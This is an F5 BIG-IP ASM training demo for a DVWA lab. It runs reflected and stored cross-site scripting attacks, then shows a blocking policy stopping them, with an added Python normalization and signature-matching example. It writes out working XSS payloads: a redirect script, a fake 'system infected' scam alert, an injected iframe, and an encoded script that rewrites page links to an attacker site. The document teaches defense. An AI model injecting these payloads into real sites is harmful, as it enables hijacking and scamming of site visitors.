Ravello Demo - ASM - Blocking Cross-Site Scripting Attacks - V13.0.A
The purpose of this demo is to show how to create an ASM security policy that will protect a web application
against cross-site scripting attacks. You’ll start by showing several cross-site scripting attacks on a vulnerable
web site. You’ll then create a security policy using the Rapid Deployment policy template. You’ll then show the
same attacks being blocked by the ASM security policy. Finally, you’ll show the ASM logs to view the attack
signatures that were detected by ASM.
Contact Chris Manly (c.manly@f5.com) with any questions or feedback for this demo.
©2017 F5 Networks, Inc. All rights reserved. F5, F5 Networks, and the F5 logo are trademarks of F5 Networks, Inc. in the U.S. and in
certain other countries. Other F5 trademarks are identified at f5.com.
Any other products, services, or company names referenced herein may be trademarks of their respective owners with no endorsement or
affiliation, express or implied, claimed by F5.
These training materials and documentation are F5 Confidential Information and are subject to the F5 Networks Reseller Agreement. You
may not share these training materials and documentation with any third party without the express written permission of F5.
ASM Demo – Blocking Cross-Site Scripting Attacks
Open an InPrivate Browsing window (IE) and click the DVWA bookmark.
WWFE Ravello Guides – Demo: ASM – Blocking Cross-Site Scripting Attacks; v13.0.A Page | 3
Click XSS reflected, then copy and paste the following into the field and then click Submit.
<script>window.location="http://www.hackthissite.org"</script>
We’re redirected to a different web site.
Click the DVWA bookmark, then click XSS stored, then create an entry named Popup, then copy and
paste the following Message, and then click Sign Guestbook.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
The information in the message field is JavaScript code, so the user is presented with an alert dialog box.
Using cross-site scripting, an attacker could insert into the field any code that JavaScript can run.
Create another entry named iFrame, then copy and paste the following Message, then
click Sign Guestbook, and then scroll down the page.
<iframe src="https://www.f5.com" width="600" height="500"></iframe>
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
The hacker used an iframe to display a different web site on this web page. All users will see this page
when they access this comments page.
Create another guestbook entry named Encoding, then copy and paste the following Message, then
click Sign Guestbook, and then scroll down the page.
index.php?name=%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
The contents of this attack are URL-encoded, which is intended to bypass security measures. Cross-site scripting is
a powerful exploit because an attacker can insert any form of script code into the database.
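To show why encoded input slips past a check on the raw text, and why a WAF such as ASM normalizes input before matching attack signatures, here is an added Python example that is not part of this guide or of F5's product. The signature list is an assumed stand-in for ASM's real signature set; the sample inputs are the three guestbook messages from this demo plus a constructed benign comment and a constructed double-encoded variant, which goes one step beyond the single encoding used in the demo.

```python
import html
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Sample inputs: the three guestbook messages pasted into DVWA in this demo,
# plus a constructed benign comment and a constructed double-encoded variant.
SAMPLE_INPUTS: Dict[str, str] = {
    "Popup": '<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>',
    "iFrame": '<iframe src="https://www.f5.com" width="600" height="500"></iframe>',
    "Encoding": "%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e",
    "Benign": "Great site, thanks for the 5 star service!",
    "DoubleEncoded": "%253c%2573%2563%2572%2569%2570%2574%253e",  # constructed: "<script>" encoded twice
}

# Assumed stand-in for ASM's XSS attack signatures (not the real signature set).
XSS_SIGNATURES = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"<\s*iframe\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),   # inline event handlers such as onload=
    re.compile(r"javascript\s*:", re.I),
]


def normalize(value: str, max_rounds: int = 5) -> str:
    """Decode the way a WAF does before matching signatures: URL-decode
    repeatedly until the value stops changing (this catches double
    encoding), then resolve HTML entities. max_rounds bounds the loop."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def raw_match(value: str) -> List[str]:
    """Signature patterns that hit on the input exactly as received."""
    return [sig.pattern for sig in XSS_SIGNATURES if sig.search(value)]


def normalized_match(value: str) -> List[str]:
    """Signature patterns that hit after normalization; this is what
    catches the percent-encoded guestbook entry."""
    return raw_match(normalize(value))


def classify(inputs: Dict[str, str]) -> Dict[str, Tuple[bool, bool]]:
    """Per entry name: (flagged by raw-only check, flagged by normalized check)."""
    return {name: (bool(raw_match(v)), bool(normalized_match(v))) for name, v in inputs.items()}


if __name__ == "__main__":
    for name, (raw, norm) in classify(SAMPLE_INPUTS).items():
        print(f"{name:14} raw_check={raw!s:5} normalized_check={norm}")
```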
Click Setup, then click Create / Reset Database, and then click Logout.
In the Configuration Utility, open the Virtual Server List page and click dvwa_virtual.
This is a standard HTTP virtual server that listens on 10.1.10.35. Note that this virtual server contains
the default http profile. An HTTP profile is required to protect against application layer attacks.
Open the Application Security > Security Policies > Policies List page, and then click Create New Policy.
Select the Advanced options.
Use the following information for the new policy, and then click Create Policy.
Policy Name: xss_security_policy
Policy Template: Rapid Deployment Policy
Virtual Server: dvwa_virtual
Enforcement Mode: Blocking
Signature Staging: Disabled
Click the DVWA bookmark, then click XSS stored, then create an entry named Popup, then copy and
paste the following Message, and then click Sign Guestbook.
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
Click the DVWA bookmark, then click XSS stored, then create an entry named iFrame, then copy and
paste the following Message, and then click Sign Guestbook.
<iframe src="https://www.f5.com" width="600" height="500"></iframe>
<script>alert("Your system is infected! Call 999-888-7777 for help.")</script>
Click the DVWA bookmark, then click XSS stored, then create a guestbook entry named Encoding, then
copy and paste the following Message, and then click Sign Guestbook.
%3c%73%63%72%69%70%74%3e%77%69%6e%64%6f%77%2e%6f%6e%6c%6f%61%64%20%3d%20%66%75%6e%63%74%69%6f%6e%28%29%20%7b%76%61%72%20%6c%69%6e%6b%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%73%42%79%54%61%67%4e%61%6d%65%28%22%61%22%29%3b%6c%69%6e%6b%5b%30%5d%2e%68%72%65%66%3d%22%68%74%74%70%3a%2f%2f%61%74%74%61%63%6b%65%72%2d%73%69%74%65%2e%63%6f%6d%2f%22%3b%7d%3c%2f%73%63%72%69%70%74%3e
With this easy-to-configure security policy, all of the web application's user input fields are now
protected against cross-site scripting attacks.
In the Configuration Utility, open the Security > Event Logs > Application > Requests page.
Note the number of blocked entries.
Select the /login.php log entry.
Click Attack signature detected.
We can view the different attack signatures that were detected, the actual parameter that was
attacked (username), and the value that was input by the malicious user.
Examine the attack type.
This was identified as a Cross Site Scripting (XSS) attack.
Click on the triangle icon after Cross Site Scripting (XSS).
That concludes this demonstration on using BIG-IP ASM to block cross-site scripting attacks.